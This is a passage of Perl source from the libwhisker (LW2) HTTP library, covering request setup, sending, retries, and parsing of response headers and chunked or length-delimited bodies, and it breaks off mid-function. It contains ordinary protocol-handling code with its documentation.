http_init_request {    # doesn't return anything\n    my ($hin) = shift;\n\n    return if ( !( defined $hin && ref($hin) ) );\n    %$hin = ();            # clear control hash\n\n    # control values\n    $$hin{whisker} = {\n        http_space1                   => ' ',\n        http_space2                   => ' ',\n        version                       => '1.1',\n        method                        => 'GET',\n        protocol                      => 'HTTP',\n        port                          => 80,\n        uri                           => '/',\n        uri_prefix                    => '',\n        uri_postfix                   => '',\n        uri_param_sep                 => '?',\n        host                          => 'localhost',\n        timeout                       => 10,\n        include_host_in_uri           => 0,\n        ignore_duplicate_headers      => 1,\n        normalize_incoming_headers    => 1,\n        lowercase_incoming_headers    => 0,\n        require_newline_after_headers => 0,\n        invalid_protocol_return_value => 1,\n        ssl                           => 0,\n        ssl_save_info                 => 0,\n        http_eol                      => \"\\x0d\\x0a\",\n        force_close                   => 0,\n        force_open                    => 0,\n        retry                         => 1,\n        trailing_slurp                => 0,\n        force_bodysnatch              => 0,\n        max_size                      => 0,\n        MAGIC                         => 31339\n    };\n\n    # default header values\n    $$hin{'Connection'} = 'Keep-Alive';\n    # $$hin{'User-Agent'} = \"Mozilla (libwhisker/$LW2::VERSION)\";\n}\n\n##################################################################\n\n=item B<http_do_request>\n\nParams: \\%request, \\%response [, \\%configs]\n\nReturn: >=1 if error; 0 if no error (also modifies response hash)\n\n*THE* core function of libwhisker.  http_do_request actually performs\nthe HTTP request, using the values submitted in %request, and placing result\nvalues in %response.  This allows you to resubmit %request in subsequent \nrequests (%response is automatically cleared upon execution).  You can \nsubmit 'runtime' config directives as %configs, which will be spliced into\n$hin{whisker}->{} before anything else.  That means you can do:\n\nLW2::http_do_request(\\%req,\\%resp,{'uri'=>'/cgi-bin/'});\n\nThis will set $req{whisker}->{'uri'}='/cgi-bin/' before execution, and\nprovides a simple shortcut (note: it does modify %req).\n\nThis function will also retry any requests that bomb out during the \ntransaction (but not during the connecting phase).  This is controlled\nby the {whisker}->{retry} value.  Also note that the returned error\nmessage in hout is the *last* error received.  All retry errors are\nput into {whisker}->{retry_errors}, which is an anonymous array.\n\nAlso note that all NTLM auth logic is implemented in http_do_request().\nNTLM requires multiple requests in order to work correctly, and so this\nfunction attempts to wrap that and make it all transparent, so that the\nfinal end result is what's passed to the application.\n\nThis function will return 0 on success, 1 on HTTP protocol error, and 2\non non-recoverable network connection error (you can retry error 1, but\nerror 2 means that the server is totally unreachable and there's no\npoint in retrying).\n\n=cut\n\nsub http_do_request {\n    my ( $hin, $hout ) = ( shift, shift );\n\n    return 2 if ( !( defined $hin  && ref($hin) ) );\n    return 2 if ( !( defined $hout && ref($hout) ) );\n\n    # setup hash\n    %$hout                     = ();\n    $$hout{whisker}            = {};\n    $$hout{whisker}->{'MAGIC'} = 31340;\n    $$hout{whisker}->{uri}     = $$hin{whisker}->{uri};\n\n    if (   !defined $$hin{whisker}\n        || !defined $$hin{whisker}->{'MAGIC'}\n        || $$hin{whisker}->{'MAGIC'} != 31339 )\n    {\n        $$hout{whisker}->{error} = 'Input hash not initialized';\n        return 2;\n    }\n\n    if ( defined $_[0] ) {    # handle extra params\n        my %hashref;\n        if ( ref( $_[0] ) eq 'HASH' ) { %hashref = %{ $_[0] }; }\n        else { %hashref = @_; }\n        $$hin{whisker}->{$_} = $hashref{$_} foreach ( keys %hashref );\n    }\n    if ( defined $$hin{whisker}->{'anti_ids'} ) {    # handle anti_ids\n        my %copy = %$hin;\n        $copy{whisker} = {};\n        %{ $copy{whisker} } = %{ $$hin{whisker} };\n        encode_anti_ids( \\%copy, $$hin{whisker}->{'anti_ids'} );\n        $hin = \\%copy;\n    }\n\n    # find/setup stream\n    my $cache_key = stream_key($hin);\n    my $stream;\n    if ( !defined $http_host_cache{$cache_key} ) {\n        $stream = stream_new($hin);\n        $http_host_cache{$cache_key} = $stream;\n    }\n    else {\n        $stream = $http_host_cache{$cache_key};\n    }\n    if ( !defined $stream ) {\n        $$hout{whisker}->{error} = 'unable to allocate stream';\n        return 2;\n    }\n\n    my $retry_count = $$hin{whisker}->{retry};\n    my $puke_flag   = 0;\n    my $ret         = 1;\n    do {    # retries wrapper\n        my ( $aret, $pass );\n\n        if ( !$stream->{valid}->() ) {\n            $stream->{clearall}->();\n            if ( !$stream->{open}->($hin) ) {\n                $$hout{whisker}->{error} =\n                  'opening stream: ' . $stream->{error};\n                $$hout{whisker}->{error} .=\n                  '(reconnect problem after prior request)'\n                  if ($puke_flag);\n                return 2;\n            }\n\n            # freshly open stream/connection, handle auth\n            if (   defined $$hin{whisker}->{proxy_host}\n                && defined $$hin{whisker}->{auth_proxy_callback} )\n            {\n                $aret =\n                  $$hin{whisker}->{auth_proxy_callback}\n                  ->( $stream, $hin, $hout );\n                return $aret if ( $aret != 0 );    # proxy auth error\n            }\n            if ( defined $$hin{whisker}->{auth_callback} ) {\n                $aret =\n                  $$hin{whisker}->{auth_callback}->( $stream, $hin, $hout );\n                return 0     if ( $aret == 200 );    # auth not needed?\n                return $aret if ( $aret != 0 );      # auth error\n            }\n        }\n\n        _ssl_save_info( $hout, $stream )\n          if ( $$hin{whisker}->{ssl} > 0\n            && $$hin{whisker}->{ssl_save_info} > 0 );\n\n        $ret = _http_do_request_ex( $stream, $hin, $hout );\n        $puke_flag++\n          if ( $ret == 1 && defined( $$hout{whisker}->{http_data_sent} ) );\n        return $ret\n          if ( $ret == 0 || $ret == 2 );    # success or fatal socket error\n        $retry_count--;\n    } while ( $retry_count >= 0 );\n\n    # if we get here, we still had errors, but no more retries\n    return $ret;\n\n}\n\n##################################################################\n\nsub _http_do_request_ex {\n    my ( $stream, $hin, $hout, $raw ) = @_;\n\n    return 2 if ( !defined $stream );\n    return 2 if ( !( defined $hin && ref($hin) ) );\n    return 2 if ( !( defined $hout && ref($hout) ) );\n    my $W = $hin->{whisker};\n\n    # setup hash, if needed\n    if ( !defined $$hout{whisker}->{MAGIC}\n        || $$hout{whisker}->{MAGIC} != 31340 )\n    {\n        %$hout                     = ();\n        $$hout{whisker}            = {};\n        $$hout{whisker}->{'MAGIC'} = 31340;\n        $$hout{whisker}->{uri}     = $$hin{whisker}->{uri};\n    }\n\n    ##### construct and send request\n    $stream->{clear}->();\n\n    if ( defined $raw && ref($raw) ) {\n        $stream->{queue}->($$raw);\n\n    }\n    else {\n        $stream->{queue}->( http_req2line($hin) );\n\n        if ( $$W{version} ne '0.9' ) {\n            $stream->{queue}->( http_construct_headers($hin) );\n            $stream->{queue}->( $$W{raw_header_data} )\n              if ( defined $$W{raw_header_data} );\n            $stream->{queue}->( $$W{http_eol} );\n            $stream->{queue}->( $$W{data} ) if ( defined $$W{data} );\n        }    # http 0.9 support\n    }\n\n    # good time to fingerprint, if requested\n    # if ( defined $$W{request_fingerprint} ) {\n    #     $$hout{whisker}->{request_fingerprint} =\n    #       'md5:' . md5( $stream->{bufout} )\n    #       if ( $$W{request_fingerprint} eq 'md5' );\n    #     $$hout{whisker}->{request_fingerprint} =\n    #       'md4:' . md4( $stream->{bufout} )\n    #       if ( $$W{request_fingerprint} eq 'md4' );\n    # }\n\n    # all data is wrangled...actually send it now\n    if ( !$stream->{'write'}->() ) {\n        $$hout{whisker}->{'error'} = 'sending request: ' . $stream->{error};\n        $stream->{'close'}->();\n        return 1;\n    }\n\n    # needed for SSL requests\n    # NOTE: this is disabled because it's just a noop anyways\n    # $stream->{writedone}->();\n\n    $$hout{whisker}->{http_data_sent} = 1;\n    $$hout{whisker}->{'lowercase_incoming_headers'} =\n      $$W{'lowercase_incoming_headers'};\n\n    ##### read and parse response\n    my @H;\n    if ( $$W{'version'} ne '0.9' ) {\n        # Clear header fields before reading new headers (prevents accumulation on retries)\n        foreach my $key (keys %$hout) {\n            delete $$hout{$key} unless $key eq 'whisker';\n        }\n        # Always initialize header_order to empty array (it's inside whisker hash)\n        $$hout{whisker}->{header_order} = [];\n        \n        do {    # catch '100 Continue' responses\n            my $resp = _http_getline($stream);\n\n            if ( !defined $resp ) {\n                $$hout{whisker}->{error} = 'error reading HTTP response';\n                $$hout{whisker}->{data}  = $stream->{bufin};\n                $stream->{'close'}->();\n                return 1;\n            }\n\n            $$hout{whisker}->{'raw_header_data'} .= $resp\n              if ( defined $$W{'save_raw_headers'} );\n\n            if ( $resp !~\n                /^([^\\/]+)\\/(\\d\\.?\\d?)([ \\t]+)(\\d+)([ \\t]*)(.*?)([\\r\\n]+)/ )\n            {\n                $$hout{whisker}->{'error'} = 'invalid HTTP response';\n                $$hout{whisker}->{'data'}  = $resp;\n                while ( defined( $_ = _http_getline($stream) ) ) {\n                    $$hout{whisker}->{'data'} .= $_;\n                }\n                $stream->{'close'}->();\n                return $$W{'invalid_protocol_return_value'} || 1;\n            }\n\n            $$hout{whisker}->{protocol}    = $1;\n            $$hout{whisker}->{version}     = $2;\n            $$hout{whisker}->{http_space1} = $3;\n            $$hout{whisker}->{code}        = $4;\n            $$hout{whisker}->{http_space2} = $5;\n            $$hout{whisker}->{message}     = $6;\n            $$hout{whisker}->{http_eol}    = $7;\n            $$hout{whisker}->{'100_continue'}++ if ( $4 == 100 );\n            $$hout{whisker}->{'uri_requested'} = $$W{'uri'}; \n\n            # Clear headers before reading (needed for 100 Continue responses)\n            # Headers from 100 Continue should be discarded, only final response headers kept\n            if ( $4 == 100 ) {\n                foreach my $key (keys %$hout) {\n                    delete $$hout{$key} unless $key eq 'whisker';\n                }\n                $$hout{whisker}->{header_order} = [];\n                # Also clear cookies array if it exists\n                $$hout{whisker}->{cookies} = [] if defined $$hout{whisker}->{cookies};\n            }\n\n            @H = http_read_headers( $stream, $hin, $hout );\n            if ( !$H[0] ) {\n                $$hout{whisker}->{'error'} =\n                  'Error in reading headers: ' . $H[1];\n                $stream->{'close'}->();\n                return 1;\n            }\n\n            if ( !defined $H[3] ) {    # connection\n                my ($t) = utils_find_lowercase_key( $hin, 'connection' );\n                $H[3] = $t || 'close';\n            }\n\n        } while ( $$hout{whisker}->{'code'} == 100 );\n\n    }\n    else {    # http ver 0.9, we need to fake it since headers are not sent\n        $$hout{whisker}->{version}      = '0.9';\n        $$hout{whisker}->{code}         = 200;\n        $$hout{whisker}->{message} \t= '';\n        $H[3]                           = 'close';\n    }\n\n    if ( $$hout{whisker}->{code}==404 && defined $$W{'shortcut_on_404'} ) {\n        $stream->{'close'}->();\n    }\n    elsif ( defined $$W{data_sock} ) {\n        $$hout{whisker}->{data_sock}   = $stream->{sock};\n        $$hout{whisker}->{data_stream} = $stream;\n    }\n    else {\n        if (\n            $$W{'force_bodysnatch'}\n            || (   $$W{'method'} ne 'HEAD'\n                && $$hout{whisker}->{'code'} != 206\n                && $$hout{whisker}->{'code'} != 102 )\n          )\n        {\n            return 1\n              if ( !http_read_body( $stream, $hin, $hout, $H[1], $H[2] ) );\n\n            # {hide_chunked_responses} stuff follows\n            if (   lc( $H[1] ) eq 'chunked'\n                && defined $$hin{whisker}->{hide_chunked_responses}\n                && $$hin{whisker}->{hide_chunked_responses} == 1\n                && !defined $$hin{whisker}->{save_raw_chunks} )\n            {\n                $$hout{'Content-Length'} = length( $$hout{whisker}->{data} );\n                utils_delete_lowercase_key( $hout, 'transfer-encoding' );\n                my $new = [];\n                my $cl  = 0;\n                foreach ( @{ $$hout{whisker}->{header_order} } ) {\n                    my $l = lc($_);\n                    if ( $l eq 'content-length' ) {\n                        $cl++;\n                        next if ( $cl > 1 );\n                    }\n                    push @$new, $_ if ( $l ne 'transfer-encoding' );\n                }\n                push @$new, 'Content-Length' if ( $cl == 0 );\n                $$hout{whisker}->{header_order} = $new;\n            }\n        }\n\n        my ($ch) = LW2::utils_find_lowercase_key( $hin, 'connection' );\n        my $cl = 0;\n        $cl++\n          if (\n            (\n                lc( $H[3] ) ne 'keep-alive' || ( defined $ch\n                    && $ch =~ m/close/i )\n            )\n            && $$W{'force_open'} != 1\n          );\n        $cl++ if ( $$W{'force_close'} > 0 || $stream->{forceclose} > 0 );\n        $cl++ if ( $$W{'ssl'} > 0 && $LW_SSL_KEEPALIVE == 0 );\n        $stream->{'close'}->() if ($cl);\n    }\n\n    if ( defined $$W{'header_delete_on_success'}\n        && ref( $$W{'header_delete_on_success'} ) )\n    {\n        foreach ( @{ $$W{'header_delete_on_success'} } ) {\n            delete $hin->{$_} if ( exists $hin->{$_} );\n        }\n        delete $$W{header_delete_on_success};\n    }\n\n    $stream->{reqs}++;\n    $$hout{whisker}->{'stats_reqs'}   = $stream->{reqs};\n    $$hout{whisker}->{'stats_syns'}   = $stream->{syns};\n    $$hout{whisker}->{'socket_state'} = $stream->{state};\n    delete $$hout{whisker}->{'error'};    # no error\n    return 0;\n\n}\n\n##################################################################\n\n=item B<http_req2line>\n\nParams: \\%request, $uri_only_switch\n\nReturn: $request\n\nreq2line is used internally by http_do_request, as well as provides a\nconvenient way to turn a %request configuration into an actual HTTP request\nline.  If $switch is set to 1, then the returned $request will be the URI\nonly ('/requested/page.html'), versus the entire HTTP request ('GET\n/requested/page.html HTTP/1.0\\n\\n').  Also, if the 'full_request_override'\nwhisker config variable is set in %hin, then it will be returned instead\nof the constructed URI.\n\n=cut\n\nsub http_req2line {\n    my ( $S, $hin, $UO ) = ( '', @_ );\n    $UO ||= 0;\n\n    # notice: full_request_override can play havoc with proxy settings\n    if ( defined $$hin{whisker}->{'full_request_override'} ) {\n        return $$hin{whisker}->{'full_request_override'};\n\n    }\n    else {    # notice the components of a request--this is for flexibility\n        if ( $UO != 1 ) {\n            $S .= $$hin{whisker}->{'method'} . $$hin{whisker}->{'http_space1'};\n            if ( $$hin{whisker}->{'include_host_in_uri'} > 0 ) {\n                if ( $$hin{whisker}->{'ssl'} == 1 ) {\n                    $S .= 'https://';\n                }\n                else {\n                    $S .= 'http://';\n                }\n\n                if ( defined $$hin{whisker}->{'uri_user'} ) {\n                    $S .= $$hin{whisker}->{'uri_user'};\n                    if ( defined $$hin{whisker}->{'uri_password'} ) {\n                        $S .= ':' . $$hin{whisker}->{'uri_password'};\n                    }\n                    $S .= '@';\n                }\n\n                $S .= $$hin{whisker}->{'host'} . ':' . $$hin{whisker}->{'port'};\n            }\n        }\n\n        $S .=\n            $$hin{whisker}->{'uri_prefix'}\n          . $$hin{whisker}->{'uri'}\n          . $$hin{whisker}->{'uri_postfix'};\n\n        if ( defined $$hin{whisker}->{'parameters'}\n            && $$hin{whisker}->{'parameters'} ne '' )\n        {\n            $S .=\n                $$hin{whisker}->{'uri_param_sep'}\n              . $$hin{whisker}->{'parameters'};\n        }\n\n        if ( $UO != 1 ) {\n            if ( $$hin{whisker}->{'version'} ne '0.9' ) {\n                $S .=\n                    $$hin{whisker}->{'http_space2'}\n                  . $$hin{whisker}->{'protocol'} . '/'\n                  . $$hin{whisker}->{'version'};\n            }\n            $S .= $$hin{whisker}->{'http_eol'};\n        }\n    }\n    return $S;\n}\n\n##################################################################\n\n=item B<http_resp2line>\n\nParams: \\%response\n\nReturn: $response\n\nhttp_resp2line provides a convenient way to turn a %response hash back \ninto the original HTTP response line.\n\n=cut\n\nsub http_resp2line {\n    my $hout = shift;\n    my $out  = '';\n    return undef if ( !defined $hout || !ref($hout) );\n    return undef if ( $hout->{whisker}->{MAGIC} != 31340 );\n    $out .= $$hout{whisker}->{protocol};\n    $out .= '/';\n    $out .= $$hout{whisker}->{version};\n    $out .= $$hout{whisker}->{http_space1};\n    $out .= $$hout{whisker}->{code};\n    $out .= $$hout{whisker}->{http_space2};\n    $out .= $$hout{whisker}->{message};\n    $out .= $$hout{whisker}->{http_eol};\n    return $out;\n}\n\n##################################################################\n\nsub _http_getline {\n    my $stream = shift;\n    my ( $str, $t, $bc ) = ( '', 0, 0 );\n\n    $t = index( $stream->{bufin}, \"\\n\", 0 );\n    while ( $t < 0 ) {\n        return undef if !$stream->{read}->() || \n\t\tlength($stream->{bufin}) == $bc;\n        $t = index( $stream->{bufin}, \"\\n\", 0 );\n    \t$bc = length( $stream->{bufin} );\n    }\n\n    my $r = substr( $stream->{bufin}, 0, $t + 1 );\n    $stream->{bufin} = substr( $stream->{bufin}, $t + 1 );\n\n    #\tsubstr($stream->{bufin},0,$t+1)='';\n    return $r;\n}\n\n##################################################################\n\nsub _http_get {    # read from socket w/ timeouts\n    my ( $stream, $amount ) = @_;\n    my ( $str, $t, $b )     = ( '', '', 0 );\n\n    while ( $amount > length( $stream->{bufin} ) ) {\n        return undef if !$stream->{read}->() ||\n\t\tlength( $stream->{bufin} ) == $b;\n\t$b = length( $stream->{bufin} );\n    }\n\n    my $r = substr( $stream->{bufin}, 0, $amount );\n    $stream->{bufin} = substr( $stream->{bufin}, $amount );\n\n    #\tsubstr($stream->{bufin},0,$amount)='';\n    return $r;\n}\n\n##################################################################\n\nsub _http_getall {\n    my ( $tmp, $b, $stream, $max_size ) = ('', 0, @_);\n\n    while ( $stream->{read}->() && length( $stream->{bufin} ) != $b) {\n        last if ( $max_size && length( $stream->{bufin} ) >= $max_size );\n        $b = length( $stream->{bufin} );\t\n    }\n    ( $tmp, $stream->{bufin} ) = ( $stream->{bufin}, '' );\n    $tmp = substr($tmp, 0, $max_size) if($max_size && \n    \tlength($tmp) > $max_size);\n    return $tmp;\n}\n\n##################################################################\n\n=item B<http_fixup_request>\n\nParams: $hash_ref\n\nReturn: Nothing\n\nThis function takes a %hin hash reference and makes sure the proper \nheaders exist (for example, it will add the Host: header, calculate the \nContent-Length: header for POST requests, etc).  For standard requests \n(i.e. you want the request to be HTTP RFC-compliant), you should call this \nfunction right before you call http_do_request.\n\n=cut\n\nsub http_fixup_request {\n    my $hin = shift;\n\n    return if ( !( defined $hin && ref($hin) ) );\n\n    $$hin{whisker}->{uri} = '/' if ( $$hin{whisker}->{uri} eq '' );\n    $$hin{whisker}->{http_space1}= ' ';\n    $$hin{whisker}->{http_space2}= ' ';\n    $$hin{whisker}->{protocol}= 'HTTP';\n    $$hin{whisker}->{uri_param_sep}= '?';\n\n    if ( $$hin{whisker}->{'version'} eq '1.1' ) {\n        my ($host) = utils_find_lowercase_key($hin,'host');\n        $$hin{'Host'} = $$hin{whisker}->{'host'} \n            if(!defined $host || $host eq '');\n        $$hin{'Host'} .= ':' . $$hin{whisker}->{'port'}\n          if ( index($$hin{'Host'},':') == -1 && \n               ( $$hin{whisker}->{port} != 80 && ( $$hin{whisker}->{ssl}==1 &&\n              $$hin{whisker}->{port} != 443 ) ) );\n        my ($conn) = utils_find_lowercase_key($hin,'connection');\n        $$hin{'Connection'} = 'Keep-Alive' \n            if(!defined $conn || $conn eq '');\n\n    } elsif( $$hin{whisker}->{'version'} eq '1.0' ){\n        my ($conn) = utils_find_lowercase_key($hin,'connection');\n        $$hin{'Connection'} = 'close' \n            if(!defined $conn || $conn eq '');\n    }\n\n    utils_delete_lowercase_key( $hin, 'content-length' );\n    if ( $$hin{whisker}->{method} eq 'POST' || \n    \t\tdefined $$hin{whisker}->{data} ) {\n\t$$hin{whisker}->{data}||='';\n        $$hin{'Content-Length'} = length( $$hin{whisker}->{'data'} );\n        my ($v) = utils_find_lowercase_key( $hin, 'content-type' );\n        if ( !defined $v || $v eq '' ) {\n            $$hin{'Content-Type'} = 'application/x-www-form-urlencoded';\n        }\n    }\n\n    #if(defined $$hin{whisker}->{'proxy_host'} && $$hin{whisker}->{ssl}==0){\n    if ( defined $$hin{whisker}->{'proxy_host'} ) {\n        $$hin{whisker}->{'include_host_in_uri'} = 1;\n    }\n\n}\n\n##################################################################\n\n=item B<http_reset>\n\nParams: Nothing\n\nReturn: Nothing\n\nThe http_reset function will walk through the %http_host_cache, \nclosing all open sockets and freeing SSL resources.  It also clears\nout the host cache in case you need to rerun everything fresh.\n\nNote: if you just want to close a single connection, and you have\na copy of the %request hash you used, you should use the http_close()\nfunction instead.\n\n=cut\n\nsub http_reset {\n    my $stream;\n\n    foreach $stream ( keys %http_host_cache ) {\n        $stream->{'close'}->() if(ref($stream));\n        delete $http_host_cache{$stream};\n    }\n}\n\n##################################################################\n\n=item B<ssl_is_available>\n\nParams: Nothing\n\nReturn: $boolean [, $lib_name, $version]\n\nThe ssl_is_available() function will inform you whether SSL requests\nare allowed, which is dependent on whether the appropriate SSL\nlibraries are installed on the machine.  In scalar context, the\nfunction will return 1 or 0.  In array context, the second element\nwill be the SSL library name that is currently being used by LW2,\nand the third element will be the SSL library version number.\nElements two and three (name and version) will be undefined if\ncalled in array context and no SSL libraries are available.\n\n=cut\n\nsub ssl_is_available {\n    return 0 if ( $LW_SSL_LIB == 0 );\n    if ( $LW_SSL_LIB == 1 ) {\n        return 1 if ( !wantarray() );\n        return ( 1, \"Net::SSLeay\", $Net::SSLeay::VERSION );\n    }\n    elsif ( $LW_SSL_LIB == 2 ) {\n        return 1 if ( !wantarray() );\n        return ( 1, \"Net::SSL\", $Net::SSL::VERSION );\n    }\n    else {\n        utils_carp('',\"ssl_is_available: sanity check failed\");\n        return 0;\n    }\n}\n\n##################################################################\n\nsub _ssl_save_info {\n    my ( $hr, $stream ) = @_;\n    my $cert;\n\n    # streamtype 4: Net::SSLeay / IO::Socket::SSL path (supports SAN)\n    if ( $stream->{streamtype} == 4 ) {\n        my $SSL = $stream->{sock};\n        $hr->{whisker}->{ssl_cipher} = Net::SSLeay::get_cipher($SSL);\n\n        if ( $cert = Net::SSLeay::get_peer_certificate($SSL) ) {\n            $hr->{whisker}->{ssl_cert_subject} =\n              Net::SSLeay::X509_NAME_oneline(\n                Net::SSLeay::X509_get_subject_name($cert) );\n            $hr->{whisker}->{ssl_cert_issuer} =\n              Net::SSLeay::X509_NAME_oneline(\n                Net::SSLeay::X509_get_issuer_name($cert) );\n            $hr->{whisker}->{ssl_cert_altnames} =\n              [ Net::SSLeay::X509_get_subjectAltNames($cert) ];\n        }\n        return;\n    }\n\n    # streamtype 5: Net::SSL / Crypt::SSLeay path\n    # NOTE: SAN extraction is not reliably available in-process from Crypt::SSLeay::X509,\n    # and attempting to mix Net::SSLeay calls here can be unstable. We intentionally do\n    # not set ssl_cert_altnames for streamtype 5.\n    if ( $stream->{streamtype} == 5 ) {\n        $hr->{whisker}->{ssl_cipher} = eval { $stream->{sock}->get_cipher() };\n\n        if ( $cert = eval { $stream->{sock}->get_peer_certificate() } ) {\n            $hr->{whisker}->{ssl_cert_subject} = eval { $cert->subject_name() };\n            $hr->{whisker}->{ssl_cert_issuer}  = eval { $cert->issuer_name()  };\n        }\n\n        return;\n    }\n\n    return;\n}\n\n##################################################################\n\n=item B<http_read_headers>\n\nParams: $stream, \\%in, \\%out\n\nReturn: $result_code, $encoding, $length, $connection\n\nRead HTTP headers from the given stream, storing the results in %out.  On\nsuccess, $result_code will be 1 and $encoding, $length, and $connection\nwill hold the values of the Transfer-Encoding, Content-Length, and\nConnection headers, respectively.  If any of those headers are not present,\nthen it will have an 'undef' value.  On an error, the $result_code will\nbe 0 and $encoding will contain an error message.\n\nThis function can be used to parse both request and response headers.\n\nNote: if there are multiple Transfer-Encoding, Content-Length, or\nConnection headers, then only the last header value is the one returned\nby the function.\n\n=cut\n\nsub http_read_headers {\n    my ( $stream, $in, $hout ) = @_;\n    my $W = $in->{whisker};\n    my ( $a, $b, $LC, $CL, $TE, $CO );\n\n    # we use direct access into the stream buffers for quickest\n    # parsing of the headers\n    my $last;\n    pos( $stream->{bufin} ) = 0;\n    while (1) {\n        $last = pos( $stream->{bufin} );\n        if ( $stream->{bufin} !~ m/(.*?)[\\r]{0,1}\\n/g ) {\n            if ( !$stream->{read}->() ) {\n                last\n                  if ( $$W{require_newline_after_headers} == 0\n                    && length( $stream->{bufin} ) - 1 == $last );\n                return ( 0, 'error reading in all headers' );\n            }\n            pos( $stream->{bufin} ) = $last;\n            next;\n        }\n        last if ( $1 eq '' );\n\n        # should we *not* puke on malformed header?\n        return ( 0, 'malformed header' )\n          if ( $1 !~ m/^([^:]+):([ \\t]*)(.*)$/ );\n\n        $$hout{whisker}->{'abnormal_header_spacing'}++ if ( $2 ne ' ' );\n\n        $a  = $1;\n        $b  = $3;\n        $LC = lc($a);\n        next if ( $LC eq 'whisker' );\n        $TE = lc($b) if ( $LC eq 'transfer-encoding' );\n        $CL = $b     if ( $LC eq 'content-length' );\n        $CO = lc($b) if ( $LC eq 'connection' );\n        push( @{ $$hout{whisker}->{cookies} }, $b )\n          if ( $LC eq 'set-cookie' || $LC eq 'set-cookie2' );\n\n        if ( $$W{'lowercase_incoming_headers'} > 0 ) {\n            $a = $LC;\n        }\n        elsif ( $$W{'normalize_incoming_headers'} > 0 ) {\n            $a = ucfirst($LC);\n            $a = 'ETag' if ( $a eq 'Etag' );\n            $a =~ s/(-[a-z])/uc($1)/eg;\n        }\n\n        push( @{ $$hout{whisker}->{header_order} }, $a );\n\n        if ( defined $$hout{$a} && $$W{ignore_duplicate_headers} != 1 ) {\n            $$hout{$a} = [ $$hout{$a} ] if ( !ref( $$hout{$a} ) );\n            push( @{ $$hout{$a} }, $b );\n        }\n        else {\n            $$hout{$a} = $b;\n        }\n    }\n\n    my $found = pos( $stream->{bufin} );\n    $$hout{whisker}->{'raw_header_data'} = substr( $stream->{bufin}, 0, $found )\n      if ( defined $$W{'save_raw_headers'} );\n    $stream->{bufin} = substr( $stream->{bufin}, $found );\n    return ( 1, $TE, $CL, $CO );\n}\n\n##################################################################\n\n=item B<http_read_body>\n\nParams: $stream, \\%in, \\%out, $encoding, $length\n\nReturn: 1 on success, 0 on error (and sets $hout->{whisker}->{error})\n\nRead the body from the given stream, placing it in $out->{whisker}->{data}.\nHandles chunked encoding.  Can be used to read HTTP (POST) request or HTTP\nresponse bodies.  $encoding parameter should be lowercase encoding type.\n\nNOTE: $out->{whisker}->{data} is erased/cleared when this function is called,\nleaving {data} to just contain this particular HTTP body.\n\n=cut\n\nsub http_read_body {\n    my ( $temp, $stream, $hin, $hout, $enc, $len ) = ( '', @_ );\n    my $max_size = $hin->{whisker}->{max_size} || 0;\n    $$hout{whisker}->{data} = '';\n\n    if ( defined $enc && lc($enc) eq 'chunked' ) {\n        my $total = 0;\n        my $x;\n        my $saveraw = $$hin{whisker}->{save_raw_chunks} || 0;\n        if ( !defined( $x = _http_getline($stream) ) ) {\n            $$hout{whisker}->{'error'} = 'Error reading chunked data length';\n            $stream->{'close'}->();\n            return 0;\n        }\n        $a = $x;\n        $a =~ tr/a-fA-F0-9//cd;\n        if ( length($a) > 8 ) {\n            $$hout{whisker}->{'error'} = 'Chunked size is too big: ' . $x;\n            $stream->{'close'}->();\n            return 0;\n        }\n        $len = hex($a);\n        $len = $max_size if ( $max_size && $len > $max_size );\n\n        $$hout{whisker}->{'data'} = $x if ($saveraw);\n\n        while ( $len > 0 ) {    # chunked sucks\n            if ( !defined( $temp = _http_get( $stream, $len ) ) ) {\n                $$hout{whisker}->{'error'} = 'Error reading chunked data';\n                $stream->{'close'}->();\n                return 0;\n            }\n            $$hout{whisker}->{'data'} .= $temp;\n            $total += $len;\n            if ( $max_size && $total >= $max_size ) {\n                $stream->{'close'}->();\n                return 1;\n            }\n            $temp = _http_getline($stream);\n            $$hout{whisker}->{'data'} .= $temp if ( $saveraw && defined $temp );\n            if ( defined $temp && $temp =~ /^[\\r\\n]*$/ ) {\n                $temp = _http_getline($stream);\n                $$hout{whisker}->{'data'} .= $temp\n                  if ( $saveraw && defined $temp );\n            }\n            if ( !defined $temp ) {\n                $$hout{whisker}->{'error'} = 'Error reading chunked data';\n                $stream->{'close'}->();\n                return 0;\n            }\n            $temp =~ tr/a-fA-F0-9//cd;\n            if ( length($temp) > 8 ) {\n                $$hout{whisker}->{'error'} =\n                  'Chunked size is too big: ' . $temp;\n                $stream->{'close'}->();\n                return 0;\n            }\n            $len = hex($temp);\n            $len = ( $max_size - $total )\n              if ( $max_size && $len > ( $max_size - $total ) );\n        }\n\n        # read in trailer headers; currently doesn't account for max_size\n        while ( defined( $_ = _http_getline($stream) ) ) {\n            $$hout{whisker}->{'data'} .= $_ if ($saveraw);\n            tr/\\r\\n//d;\n            last if ( $_ eq '' );\n        }\n\n    }\n    else {\n        if ( defined $len ) {\n            return 1 if ( $len <= 0 );\n            $len = $max_size if ( $max_size && $len > $max_size );\n            if (\n                !defined(\n                    $$hout{whisker}->{data} = _http_get( $stream, $len )\n                )\n              )\n            {\n                $stream->{'close'}->();\n\n\t\t\t\t\t\t\t\t# New LW2.5 feature: allow_short_reads will still return\n\t\t\t\t\t\t\t\t# success, even if all the data wasn't read.  This was\n\t\t\t\t\t\t\t\t# per request due to some 3Com switches sending out\n\t\t\t\t\t\t\t\t# the wrong content-length in HTTP response\n\t\t\t\t\t\t\t\tmy $s = $$hin{whisker}->{allow_short_reads} || 0;\n\t\t\t\t\t\t\t\tif ( $s != 0 && length($stream->{'bufin'}) > 0 ) {\n\t\t\t\t\t\t\t\t\t# short read is requested, and there is some data, so\n\t\t\t\t\t\t\t\t\t# copy it over and return a non-error\n\t\t\t\t\t\t\t\t\t$$hout{whisker}->{'data'} = $stream->{'bufin'};\n\t\t\t\t\t\t\t\t\treturn 1;\n\t\t\t\t\t\t\t\t}\n\n                $$hout{whisker}->{'error'} =\n                  'Error reading data: ' . $stream->{error};\n                return 0;\n            }\n        }\n        else {    # Yuck...read until server stops sending....\n            $$hout{whisker}->{data} = _http_getall( $stream, $max_size );\n            $stream->{'close'}->();\n        }\n        $$hout{whisker}->{'data'} ||= '';\n    }\n    return 1;\n}\n\n##################################################################\n\n=item B<http_construct_headers>\n\nParams: \\%in\n\nReturn: $data\n\nThis function assembles the headers in the given hash into a data\nstring.\n\n=cut\n\nsub http_construct_headers {\n    my $hin = shift;\n    my ( %SENT, $output, $i );\n\n    my $EOL = $hin->{whisker}->{http_eol} || \"\\x0d\\x0a\";\n    if ( defined $hin->{whisker}->{header_order}\n        && ref( $hin->{whisker}->{header_order} ) eq 'ARRAY' )\n    {\n        foreach ( 